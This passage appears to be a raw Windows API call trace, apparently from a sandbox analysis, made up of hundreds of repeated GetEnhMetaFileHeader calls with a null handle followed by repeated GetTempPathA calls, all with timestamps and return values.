lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.329] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0113.349] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
